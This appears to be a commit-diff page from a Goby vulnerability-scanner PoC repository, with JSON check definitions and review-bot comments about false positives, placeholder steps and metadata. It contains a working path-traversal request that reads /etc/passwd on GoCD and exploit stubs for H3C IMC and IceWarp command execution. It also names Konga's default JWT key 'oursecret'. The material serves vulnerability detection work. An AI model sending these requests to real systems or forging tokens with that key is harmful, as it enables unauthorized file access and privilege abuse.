  • lib/goby/goby_pocs/Gitlab_RCE_CVE_2021_22205.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • ■ ■ ■ ■ ■ ■
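--- a/lib/goby/goby_pocs/GoCD_Arbitrary_file_reading_CVE_2021_43287.json
+++ b/lib/goby/goby_pocs/GoCD_Arbitrary_file_reading_CVE_2021_43287.json
@@ -0,0 +1,99 @@
+{
+ "Name": "GoCD Arbitrary file reading CVE-2021-43287",
+ "Level": "3",
+ "Tags": [
+ "fileread"
+ ],
+ "GobyQuery": "title=\"Login - Go\"",
+ "Description": "",
+ "Product": "",
+ "Homepage": "https://gobies.org/",
+ "Author": "[email protected]",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [
+ "https://gobies.org/"
+ ],
+ "HasExp": true,
+ "ExpParams": null,
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "root",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "root",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "PostTime": "2022-07-15 22:05:52",
+ "GobyVersion": "1.9.323"
+}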
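Review bot: The response test at lines 46–52 only requires `$body` to contain `root` on a 200, which any page mentioning that word satisfies, and with `"follow_redirect": true` a login or error page reached by redirect can trigger it. A passwd-shaped match such as `"operation": "regex", "value": "root:.*:0:0:"` (assuming the engine's `regex` operation is available here) together with `"follow_redirect": false` would cut false positives in both `ScanSteps` and `ExploitSteps`. The file also appears to cover the same CVE as GoCD_Unauthorized_Path_Traversal_CVE_2021_43287.json, listed right after it as unchanged, so one host may be reported twice. `Description`, `Product`, `Impact` and `Recommendation` are all empty and the only reference is `https://gobies.org/`; the entry should at least cite the vendor advisory and state the upgrade guidance.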
  • lib/goby/goby_pocs/GoCD_Unauthorized_Path_Traversal_CVE_2021_43287.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Grafana_Angularjs_Rendering_XSS_CVE_2021_41174.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Grafana_Arbitrary_file_read.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Grafana_Plugins_Arbitrary_File_Read.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Grafana_v8.x_Arbitrary_File_Read_CVE_2021_43798.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • ■ ■ ■ ■ ■ ■
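--- a/lib/goby/goby_pocs/H3C_IMC_RCE.json
+++ b/lib/goby/goby_pocs/H3C_IMC_RCE.json
@@ -1,32 +1,26 @@
 {
- "Name": "H3C IMC RCE",
+ "Name": "H3C IMC",
  "Level": "3",
- "Tags": [
- "rce"
- ],
+ "Tags": [],
  "GobyQuery": "product=\"H3C-iMC\"",
- "Description": "H3C IMC",
- "Product": "H3C IMC",
+ "Description": "",
+ "Product": "H3C iMC ",
  "Homepage": "http://www.h3c.com/cn/Products___Technology/Products/H3C_Soft/IT_Business/Resource/iMC_Flat",
- "Author": "",
- "Impact": "A vulnerability in H3C IMC allows remote unauthenticated attackers to cause the remote web application to execute arbitrary commands via the 'dynamiccontent.properties.xhtml' endpoint.",
- "Recommendation": "",
+ "Author": "ying",
+ "Impact": "",
+ "Recommandation": "",
  "References": [
- "https://mp.weixin.qq.com/s/BP9_H3lpluqIwL5OMIJlIw",
  "https://www.t00ls.net/articles-60979.html"
  ],
- "HasExp": true,
- "ExpParams": [
- {
- "Name": "Cmd",
- "Type": "input",
- "Value": "whoami"
- }
- ],
- "ExpTips": {
- "Type": "",
- "Content": ""
- },
+ "HasExp": true,
+ "ExpParams": [
+ {
+ "name": "Cmd",
+ "type": "input",
+ "value": "whoami",
+ "show": ""
+ }
+ ],
  "ScanSteps": [
  "AND",
  {
@@ -63,8 +57,8 @@
  },
  "SetVariable": []
  }
- ],
- "ExploitSteps": [
+ ],
+ "ExploitSteps": [
  "AND",
  {
  "Request": {
@@ -99,10 +93,10 @@
  ]
  },
  "SetVariable": [
- "output|lastbody|undefined|undefined"
- ]
+ "output|lastbody"
+ ]
  }
- ],
- "PostTime": "0000-00-00 00:00:00",
- "GobyVersion": "0.0.0"
+ ],
+ "PostTime": "2021-05-28 10:06:39",
+ "GobyVersion": "1.8.268"
 }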
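Review bot: The new side renames the key to `"Recommandation"` (new line 11), while IRDM4000_Smart_station_Unauthorized_access.json and Konga_Default_JWT_KEY.json in this same commit keep `"Recommendation"`, so whichever spelling the loader reads, one group of files will come up without the field; I would keep `"Recommendation": "",` here. The same rename appears in IceWarp_WebClient_basic_RCE.json and Jitong_EWEBS_phpinfo_leak.json. This section also empties `"Tags"` and `"Impact"` and drops "RCE" from `"Name"`, which leaves a Level 3 finding that no longer says what was detected; keeping the removed `"Tags": ["rce"]` and the old Impact sentence gives whoever triages the result something to act on. The trailing space in `"Product": "H3C iMC "` looks accidental and would break exact-match grouping by product.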
  • lib/goby/goby_pocs/H5S_CONSOLE_Video_Platform_GetSrc_Information_Leak_CNVD_2021_25919.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/H5S_Video_Platform_GetUserInfo_Info_Leak_CNVD_2021_35567.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/H5S_video_platform_GetSrc_information_leakage.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/H5S_video_platform_GetUserInfo_Account_password_leakage.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/HIKVISION 视频编码设备接入网关 任意文件下载.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/HIKVISION.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/HIKVISION_Video_coding_equipment_Download_any_file.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Hikvision_RCE_CVE_2021_36260.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Hikvision_Unauthenticated_RCE_CVE-2021-36260.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Hikvision_Video_Encoding_Device_Access_Gateway_Any_File_Download.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/HotelDruid_Hotel_Management_Software_v3.0.3_XSS_CVE_2022_26564.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Hsmedia_Hgateway_Default_account.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/IFW8_Enterprise_router_Password_leakage_.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/IFW8_Router_ROM_v4.31_Credential_Discovery_CVE_2019_16313.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • ■ ■ ■ ■ ■
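--- a/lib/goby/goby_pocs/IRDM4000_Smart_station_Unauthorized_access.json
+++ b/lib/goby/goby_pocs/IRDM4000_Smart_station_Unauthorized_access.json
@@ -1,18 +1,18 @@
 {
  "Name": "IRDM4000 Smart station Unauthorized access",
  "Level": "2",
- "Tags": [
- "unauthorized access"
- ],
+ "Tags": [],
  "GobyQuery": "body=\"iRDM4000智慧站房在线监管\"",
- "Description": "IRDM4000 Smart station",
+ "Description": "IRDM4000 unauthorized access vulnerability of userId=0",
  "Product": "IRDM4000 Smart station",
- "Homepage": "http://www.houtian-hb.com/",
- "Author": "",
- "Impact": "IRDM4000 unauthorized access vulnerability of userId=0",
+ "Homepage": "http://www.houtian-hb.com",
+ "Author": "gobysec@gmail.com",
+ "Impact": "",
  "Recommendation": "",
- "References": [],
- "HasExp": false,
+ "References": [
+ "https://gobies.org/"
+ ],
+ "HasExp": true,
  "ExpParams": null,
  "ExpTips": {
  "Type": "",
@@ -64,6 +64,43 @@
  ]
  }
  ],
- "PostTime": "0000-00-00 00:00:00",
- "GobyVersion": "0.0.0"
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/test.php",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "test",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "PostTime": "2021-10-26 10:55:38",
+ "GobyVersion": "1.9.304"
 }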
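Review bot: The added `"ExploitSteps"` block (new lines 67-103) requests `/test.php` and passes when the body contains `test`, which has nothing to do with the userId=0 issue the Description names and looks like an unedited template. Combined with `"HasExp": true` on new line 15, the entry now claims a verification step that can report success on any host serving a page with "test" in it, so results from it cannot be trusted as confirmation. I would keep `"HasExp": false,` and leave `"ExploitSteps"` out until a step that actually checks the reported condition is written. Emptying `"Tags"` also removes the only machine-readable category (`"unauthorized access"`) from the entry.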
  • ■ ■ ■ ■ ■ ■
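--- a/lib/goby/goby_pocs/IceWarp_WebClient_basic_RCE.json
+++ b/lib/goby/goby_pocs/IceWarp_WebClient_basic_RCE.json
@@ -1,31 +1,26 @@
 {
  "Name": "IceWarp WebClient basic RCE",
  "Level": "3",
- "Tags": [
- "rce"
- ],
+ "Tags": [],
  "GobyQuery": "body=\"Powered by IceWarp\"",
- "Description": "IceWarp",
- "Product": "IceWarp",
- "Homepage": "http://www.icewarp.cn/",
- "Author": "",
- "Impact": "IceWarp WebClient basic RCE",
- "Recommendation": "",
+ "Description": "",
+ "Product": "",
+ "Homepage": "https://gobies.org/",
+ "Author": "luckying",
+ "Impact": "",
+ "Recommandation": "",
  "References": [
- "https://www.pwnwiki.org/index.php?title=IceWarp_WebClient_basic_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"
+ "https://gobies.org/"
  ],
- "HasExp": true,
- "ExpParams": [
- {
- "Name": "cmd",
- "Type": "input",
- "Value": "ipconfig"
- }
- ],
- "ExpTips": {
- "Type": "",
- "Content": ""
- },
+ "HasExp": true,
+ "ExpParams": [
+ {
+ "name": "cmd",
+ "type": "input",
+ "value": "ipconfig",
+ "show": ""
+ }
+ ],
  "ScanSteps": [
  "AND",
  {
@@ -55,7 +50,7 @@
  "SetVariable": []
  }
  ],
- "ExploitSteps": [
+ "ExploitSteps": [
  "AND",
  {
  "Request": {
@@ -82,10 +77,10 @@
  ]
  },
  "SetVariable": [
- "output|lastbody|undefined|undefined"
- ]
+ "output|lastbody"
+ ]
  }
  ],
- "PostTime": "0000-00-00 00:00:00",
- "GobyVersion": "0.0.0"
+ "PostTime": "2021-06-19 13:19:47",
+ "GobyVersion": "1.8.268"
 }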
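Review bot: New lines 7-13 blank `"Product"` and point both `"Homepage"` and `"References"` at `https://gobies.org/`, so the entry no longer names the affected product, its vendor or any write-up of the issue. Someone who gets this finding in a report then has nothing to check it against or to look up a fix from. I would keep `"Product": "IceWarp",` and `"Homepage": "http://www.icewarp.cn/",` and retain the removed reference URL alongside any new one. The change of `"SetVariable"` from `"output|lastbody|undefined|undefined"` to `"output|lastbody"` is presumably a cleanup, but the parser for that string is not visible here, so confirm it accepts the two-field form.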
  • lib/goby/goby_pocs/JQuery_1.7.2Version_site_foreground_arbitrary_file_download.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/JQuery_1.7.2_Filedownload.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Jellyfin_10.7.0_Unauthenticated_Abritrary_File_Read_CVE_2021_21402.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Jellyfin_10.7.2_SSRF_CVE-2021-29490.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Jellyfin_SSRF_CVE_2021_29490.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Jellyfin_prior_to_10.7.0_Unauthenticated_Arbitrary_File_Read_CVE_2021_21402.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Jetty_WEB_INF_FileRead_CVE_2021_28169.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Jetty_WEB_INF_FileRead_CVE_2021_34429.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/JinHe_OA_C6_Default_password.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/JinHe_OA_C6_download.jsp_Arbitrary_fileread.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/JingHe_OA_C6_Default_password.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Jinher_OA_C6_download.jsp_Arbitrary_file_read.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Jinshan_V8.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Jitong_EWEBS_Fileread.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Jitong_EWEBS_arbitrary_file_read.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • ■ ■ ■ ■ ■
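--- a/lib/goby/goby_pocs/Jitong_EWEBS_phpinfo_leak.json
+++ b/lib/goby/goby_pocs/Jitong_EWEBS_phpinfo_leak.json
@@ -1,23 +1,17 @@
 {
- "Name": "Jitong EWEBS phpinfo leak",
- "Level": "0",
- "Tags": [
- "infoleak"
- ],
+ "Name": "极通EWEBSphpinfo泄露",
+ "Level": "3",
+ "Tags": [],
  "GobyQuery": "body=\"极通软件\"",
  "Description": "",
- "Product": "Jitong EWEBS",
- "Homepage": "http://www.n-soft.com.cn/",
- "Author": "",
- "Impact": "Jitong EWEBS phpinfo leak",
- "Recommendation": "",
- "References": [],
- "HasExp": true,
- "ExpParams": null,
- "ExpTips": {
- "Type": "",
- "Content": ""
- },
+ "Product": "",
+ "Homepage": "https://gobies.org/",
+ "Author": "gobysec@gmail.com",
+ "Impact": "",
+ "Recommandation": "",
+ "References": [
+ "https://gobies.org/"
+ ],
  "ScanSteps": [
  "AND",
  {
@@ -25,7 +19,7 @@
  "method": "GET",
  "uri": "/testweb.php",
  "follow_redirect": false,
- "header": null,
+ "header": {},
  "data_type": "text",
  "data": ""
  },
@@ -45,34 +39,6 @@
  "SetVariable": []
  }
  ],
- "ExploitSteps": [
- "AND",
- {
- "Request": {
- "method": "GET",
- "uri": "/testweb.php",
- "follow_redirect": false,
- "header": null,
- "data_type": "text",
- "data": "",
- "set_variable": []
- },
- "ResponseTest": {
- "type": "group",
- "operation": "AND",
- "checks": [
- {
- "type": "item",
- "variable": "$body",
- "operation": "contains",
- "value": "PHP Version",
- "bz": ""
- }
- ]
- },
- "SetVariable": []
- }
- ],
- "PostTime": "0000-00-00 00:00:00",
- "GobyVersion": "0.0.0"
+ "PostTime": "2021-06-17 21:19:12",
+ "GobyVersion": "1.8.268"
 }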
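Review bot: New line 3 raises `"Level"` from `"0"` to `"3"` for a phpinfo disclosure, the same value the H3C IMC and IceWarp command-execution entries in this commit carry. If Level is the severity shown to the operator, as that usage suggests, this information leak will now be ranked alongside remote code execution and skew triage. I would keep `"Level": "0",` or pick a value below the RCE entries, and keep `"Tags": ["infoleak"]` so the category survives. The `"Name"` also switches to Chinese while the file name and the other entries on this page stay English, which makes the finding harder to search for in mixed reports.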
  • lib/goby/goby_pocs/KEDACOM_MTS_transcoding_server_Arbitrary_file_download_CNVD_2020_48650.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/KEDACOM_MTS_transcoding_server_Fileread_CNVD_2020_48650.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Kingsoft_V8_Arbitrary_file_read.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Kingsoft_V8_Default_weak_password.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Kingsoft_V8_Terminal_Security_System_Default_Login_CNVD_2021_32425.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Kingsoft_V8_Terminal_Security_System_Fileread.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • ■ ■ ■ ■ ■ ■
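--- a/lib/goby/goby_pocs/Konga_Default_JWT_KEY.json
+++ b/lib/goby/goby_pocs/Konga_Default_JWT_KEY.json
@@ -4,12 +4,12 @@
  "Tags": [
  "defaultaccount"
  ],
- "GobyQuery": "title=\"Konga\" || body=\"window.konga_version\"",
- "Description": "Konga offers the tools you need to manage your Kong cluster with ease.",
+ "GobyQuery": "(title==\"Konga\" | body=\"window.konga_version\")",
+ "Description": "Konga JWT默认key为oursecret,可伪造任意用户权限。",
  "Product": "Konga",
  "Homepage": "https://github.com/pantsel/konga",
- "Author": "",
- "Impact": "The default key of Konga JWT is oursecret, which can forge arbitrary user permissions.",
+ "Author": "aetkrad",
+ "Impact": "",
  "Recommendation": "",
  "References": [
  "https://mp.weixin.qq.com/s/8guU2hT3wE2puEztdGqZQg"
@@ -112,6 +112,6 @@
  ]
  }
  ],
- "PostTime": "0000-00-00 00:00:00",
- "GobyVersion": "0.0.0"
+ "PostTime": "2021-12-03 18:50:39",
+ "GobyVersion": "1.9.310"
 }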
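Review bot: The rewritten `"GobyQuery"` on new line 7 uses `==` and a single `|`, where every other query on this page uses `=` and the old line used `||`. The query parser is not visible here, but if it does not accept that form the entry matches no asset and the default-key check silently stops running, which is a detection gap rather than an error anyone will see. Unless the new syntax is confirmed against the loader, I would keep `"GobyQuery": "title=\"Konga\" || body=\"window.konga_version\"",`. This hunk also empties `"Impact"` and leaves `"Recommendation": ""`, so a hit carries no remediation text; a one-line recommendation to replace the shipped JWT signing key with a unique secret would make the finding actionable.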
  • lib/goby/goby_pocs/Kyan.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Kyan_Account_password_leak.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Kyan_design_account_password_disclosure.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Kyan_network_monitoring_device_account_password_leak.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Kyan_network_monitoring_device_run.php_RCE.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Kyan_run.php_RCE.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical